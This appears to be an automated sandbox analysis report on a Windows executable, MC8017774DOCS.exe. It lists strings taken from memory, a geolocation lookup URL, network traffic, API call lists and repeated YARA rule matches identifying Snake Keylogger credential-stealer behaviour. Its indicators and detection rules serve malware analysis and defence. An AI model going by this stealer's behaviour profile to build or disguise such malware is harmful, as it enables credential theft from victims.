                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile created: C:\Windows\resources\0809Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_00404C7B0_2_00404C7B
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_6E9B1B630_2_6E9B1B63
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 4_2_03E43AAC4_2_03E43AAC
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 4_2_03E4B9784_2_03E4B978
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 4_2_03E44BC84_2_03E44BC8
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 4_2_03E41B4C4_2_03E41B4C
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 4_2_03E469D14_2_03E469D1
                    Source: MC8017774DOCS.exe, 00000004.00000003.2639623192.0000000035F05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476036769.0000000033A77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
